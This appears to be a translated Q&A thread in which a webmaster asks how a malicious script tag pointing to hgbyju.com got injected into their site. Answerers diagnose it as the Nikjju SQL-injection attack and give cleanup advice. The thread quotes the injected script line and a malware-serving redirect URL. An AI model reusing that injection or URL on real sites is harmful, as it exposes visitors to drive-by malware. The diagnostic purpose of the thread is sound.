1

我正在网站http://palacechemicals.co.uk/上工作,该网站不知何故感染了恶意(但良性)的 JavaScript 行:

</title><script src=http://hgbyju.com/r.php ></script>

在第 251 行。脚本尝试加载的 URL 返回 404,但 Google 仍将我们列入恶意软件列表。

我在另一台机器上有一个干净的、工作的本地副本,并且手动和软件比较了每个文件夹的文件大小,两者是相同的。我还多次搜索用于将数据导入 MSSQL Server 2008 的 SQL,以查找各种不同的字符串,包括 eval、script 等。

我真的被难住了,不知道接下来要寻找什么。

有没有其他人遇到过这个问题或者可以推荐下一步的行动?

难道是托管服务提供商被某种方式感染了?我们在一个共享的托管平台上,但是主机相当大且信誉良好。

任何投入将不胜感激。谢谢你。

4

6 回答 6

2

当我从 Chrome 访问该网站时,没有任何反应。但是当我从 Firefox 访问它时,脚本链接不会返回状态 404。有一个恶意脚本将我重定向到带有 Emma Watson 视频的“YouTube”。

那只发生过一次。第二次又是404。我将尝试从另一个 IP 地址复制它。

这是我被重定向的地方:

http://www1.thebest-scanerjjn.it.cx/o9gzj2z?2nvq3n=Vtfn5per7tvJzNjp1VPozMWrmqicnZSi19quZpTVysfUosXIeJnP1KuXppuQ3aWr7edqlNbRyZ%2FH0rpzmdLQ36Ld09jkpOOc1JaruLOLy9WwrF2hmZSclqKhmJ9jopzkp8%2Fo3diflpnrltegl6eL5t7Wq2ufpqaYoqadl5KWmeigsJSUoZmrnJ%2BjZJ%2Bc1aLb1dHTn9zq62Ch1sLUyuLU2NOm5eXjnpzX19KI1NTZm%2Bugw9zH6eOQ4JfUs9mn4uSNmKOKpbpSpanRz9HTzc%2FRmtPj2pbP4NuTxdSh6ZiYlaeS

不要去那里。有一个可执行文件试图下载,谁知道还有什么。

所以脚本有效,它并不总是返回 404。在删除恶意链接后,您应该认真检查您的站点的安全性。

  • 更改所有密码;
  • 如果您使用 CMS,请将其更新到最新版本;
  • 如果是自研网站,请审核其是否存在 SQL 注入和其他类型的安全漏洞。
于 2012-04-20T12:40:09.457 回答
1

如果没有更多信息,我猜最简单的原因是最可能的:您的密码已被泄露,攻击者直接更改了您的脚本。

  • 更正包含该行的页面/脚本。这可能意味着从您的干净副本重新加载整个站点,只是为了安全起见——攻击者可能有一个脚本可以动态更改文件。
  • 使用强密码更改所有管理密码。

[我一直使用强密码,但至少有一个站点用作文件服务器。攻击者没有改变我的任何东西,但本可以做到。删除他们的内容并更改密码似乎暂时解决了这个问题。]

于 2012-04-20T12:45:59.077 回答
1

您应该搜索十进制和十六进制的 HTML 实体,而不是搜索明文。

例如:

&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;是十六进制的 script

&#x003c;&#x003e;是十六进制的<>

如果您在 .NET 3.5 中使用 WebForms 并且没有正确清理输入字符串,则脚本注入的可能性很大。如果您在任何页面上关闭了请求验证,您应该针对这些替代输入测试这些页面。

就个人而言,我会查看受感染页面上的所有数据驱动输入,并扫描该数据以查找 html 实体,而不仅仅是和 等常用evalscript

编辑: html 实体应始终以 开头&#,这应该比在 hex、decimal、unicode 等中查找关键字更容易搜索。

于 2012-04-20T12:55:45.850 回答
1

您的站点容易受到 SQLi 的攻击,因此它会一次又一次地被感染。

问候 DeltaR

于 2012-04-23T10:50:49.297 回答
1

难道是托管服务提供商被某种方式感染了?我们在一个共享的托管平台上,但是主机相当大且信誉良好。

阅读您网站的 Chrome 恶意软件诊断。如果您单击诊断中指向AS15418 (FASTHOSTS)的链接,则会显示托管服务有很多站点被感染:

当 Google 访问托管在此网络上的网站时发生了什么?

在过去 90 天内我们在此网络上测试的 45254 个站点中,有885 个站点(包括例如 lalydesign.co.uk/、consolegaming.eu/、nimbiz.com/)提供的内容导致在未经用户同意的情况下下载和安装恶意软件。

Google 上一次在该网络上测试网站是在 2012 年 4 月 23 日,最后一次发现可疑内容是在 2012 年 4 月 23 日。

...

该网络是否托管了散布恶意软件的站点?

是的,该网络托管的网站在过去 90 天内分发了恶意软件。我们发现35 个站点(例如 hipsxpress.co.uk/、qpscars.co.uk/、aroundbritain.co.uk/)感染了58 个其他站点,例如 meb。 gov.tr/、opes.go.th/、stephenbrowning.co.uk/。

我的猜测是您应该对他们施加压力(编辑)以解决安全问题,或更改托管服务。

于 2012-04-23T14:14:57.657 回答
0

许多网站已受到此攻击的影响。针对易受攻击的 ASP 站点的网络犯罪分子。

黑客通过利用您站点中的 SQL 注入漏洞在您的站点中注入此代码。

安全提示:

  • 分析代码: 检查您网站中所有页面的源代码。不要简单地搜索脚本,阅读每一行。找到可疑代码并将其删除(确保它不是您的代码)。注意:某些脚本可能会被编码,因此请仔细检查代码。

  • 目录中的文件:检查托管目录中的任何可疑文件。

  • 修补漏洞:黑客通过利用 SQLi 漏洞注入此代码。因此,请尝试在您的站点中找到易受攻击的部分并进行修复。如果您不知道如何执行此操作,请聘请安全专家。您也可以使用一些自动 sqli 扫描程序来查找漏洞(但它不是 100% 准确的)。

  • 更改密码:修补漏洞后,请更改主机、ftp、mysql 的密码。如果您在其他任何地方使用相同的密码,那么也更改它们。

信息: 上述注入通常被称为 Nikjju 攻击。详细信息可以在这里找到: Nikjju Sql Injection attack &malicious domain

于 2012-05-12T09:19:18.493 回答